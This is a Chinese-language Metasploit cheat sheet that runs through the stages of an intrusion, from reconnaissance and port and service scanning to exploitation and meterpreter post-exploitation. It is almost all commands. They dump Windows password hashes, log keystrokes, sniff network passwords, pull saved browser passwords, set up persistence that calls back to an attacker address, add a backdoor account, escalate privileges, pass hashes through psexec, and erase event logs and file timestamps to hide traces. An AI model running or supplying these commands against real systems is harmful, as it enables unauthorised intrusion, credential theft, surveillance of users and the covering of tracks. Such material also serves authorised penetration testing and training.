信息收集階段
Whois信息收集
msf auxiliary > whois baidu.com
域名信息查詢階段
msf auxiliary > nslookup www.baidu.com
msf auxiliary > dig @114.114.114.114 www.baidu.com
主機端口探測階段
直接使用PING命令探測連通性
ping 1.2.3.4
msf > use auxiliary/scanner/discovery/arp_sweep
msf > set RHOSTS 1.1.1.0/24
msf > set THREADS 50
msf > run
使用NMAP探測
msf > nmap command
服務掃描打點
telnet服務:use auxiliary/scanner/telnet/telnet_version
ssh服務:use auxiliary/scanner/ssh/telnet_version
Oracle服務:use auxiliary/scanner/oracle/tnslsnr_version
http服務:use auxiliary/scanner/http/open_proxy
口令探測
ssh服務:use auxiliary/scanner/ssh/telnet_login
ftp服務:use auxiliary/sniffer/psnuffle
漏洞掃描階段
那是nessus openVAS等的天下,可以利用PostgreSQL數據庫進行聯動
MSF框架下的WEB滲透
為什么不用burpsuite呢,用burpsuite更好
還有SQLMAP啊,還有好多其他的啊,啦啦啦
漏洞利用階段
選擇合適的漏洞利用payload和攻擊腳本即可
use xxx
set payload xxx
強大的meterpreter
meterpreter > background 后台運行meterpreter
meterpreter > sessions 列出session,選擇交互session的話 使用session -i x
msterpreter > shell
msterpreter > cat xxxxx 查看文件
msterpreter > getwd/getlwd 獲取當下路徑
msterpreter > upload xxx.exe c:\ 上傳文件或文件夾
msterpreter > download c:\\"Program Files"\\xxx\\xxx\\xxx ./ 下載文件
msterpreter > edit 使用vi編輯器編輯目標機上的文件
msterpreter > search 搜索目標上的文件
msterpreter > ipconfig 查看網絡信息
msterpreter > portfwd add -l 1234 -p 3389 -r 1.2.3.4 將目標機的3389 轉發到本地1234端口
msterpreter > route 查看目標機的路由信息
msterpreter > ps 查看進程表
msterpreter > migrate 轉移shell到進程
msterpreter > execute -H -f cmd.exe 隱藏執行cmd
msterpreter > execute -H -i -f cmd.exe 可以與cmd交互了 -m 參數直接在內存執行供給端的可執行文件 execute -H -m -d xxx.exe -f xxx.exe -a "-o xxxx.txt"
msterpreter > getpid 獲取當前會話所在進程的pid
msterpreter > getuid /whoami 獲取自己是誰
msterpreter > sysinfo 查看系統信息
msterpreter > kill 殺掉進程
msterpreter > shutdown關機
msterpreter > hashdump 獲取windows 的hash口令
msterpreter > run persistence -X -i 5 -p 443 -r 192.168.10.141
msterpreter > run metsvc #吧31337端口打開監聽meterpreter
msterpreter > run getgui -u metaspolit -p meterpreter 添加賬戶metaspolit 密碼meterpreter
msterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up_xxxxxxxx.xxxx.rc
msterpreter > getsystem 提權
msterpreter > run post/windows/gather/dumplinks 獲取最近處理的文檔
msterpreter > run post/windows/gather/enum_applications 獲取安裝的程序
msterpreter > keyscan_start 鍵盤記錄
msterpreter > keyscan_dump
msterpreter > keyscan_stop 關閉
msterpreter > use sniffer #網絡監聽獲取密碼
msterpreter > sniffer_interface
msterpreter > sniffer_start 1
msterpreter > sniffer_dump 1 /tmp/xxx.pcap
msterpreter > sniffer_stop 1
msterpreter > run post/windows/gather/enum_ie 瀏覽器獲取密碼
msterpreter > run windows/gather/smart_hashdump 獲取系統口令
msterpreter > run get_local_subnets 添加路由
msterpreter > background 后 route add a.b.c.d x.x.x.x 1 然后查看route print
msf > use exploit/windows/smb/psexec
msf > set RHOST RPORT LHOST ...
msf > set SMBPass hash值
msf > exploit
msterpreter > clearev 刪除日志
msterpreter >timestomp 停止修改文件屬性的時間記錄